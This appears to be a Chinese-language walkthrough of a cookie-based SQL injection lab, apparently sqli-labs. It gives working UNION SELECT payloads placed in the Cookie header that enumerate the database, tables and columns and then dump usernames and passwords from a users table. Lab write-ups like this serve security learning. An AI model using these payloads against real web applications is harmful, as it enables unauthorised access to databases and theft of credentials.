0X01
試探一下 這是登錄成功的頁面
這里題目高速我們是基於cookie的注入
0X01抓包試探
這里登陸的時候有兩個包
我們要含有cookie的那個包
0X02試探判斷是否cookie存在注入
Cookie: uname=admin'
報錯 那么應該是基於'的cookie注入 我們現在找到了 是cookie的注入 並且是’閉合 那么我們如何進行注入吶?
怎么知道原來的語句吶?這里有一點點思路了 構造后面一個數據一個數據的加 加在,后面
Cookie: uname=admin',1)#
Cookie: uname=admin',1,1)#
Cookie: uname=admin',1,1,1)#
似乎好像不行 那cookie是如何和數據庫進行交互的吶?
看了源碼 原來如此
你登錄成功 就會在數據庫存放cookiee的變量
然后以下每一次提交
那我們第一次cookie正確提交 后面直接構造語句進行
這里查詢cookie的語句是* 但是我們知道secruity這個里面有3個表 所以這里我們構造語句
Cookie: uname=1' union select 1,2,database()#
這里不能填入你正確的cookie 如果你填入真確的那么他就不會顯示出你后面語句要查詢的結果 name 和password都會顯示成你正確的、
所以這里我們要填錯誤的cookie來進行注入
0X02爆表名 限制了輸出長度 這里用limit 繞過
Cookie: uname=ad' union select 1,2,(select table_name from information_schema.tables where table_schema='security' limit 3,1)#
0X03組合拳打法
列
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#
字段
1' union select 1,2,group_concat(concat_ws('-',id,username,password)) from users#
切記 學習之路 少就是多 慢就是快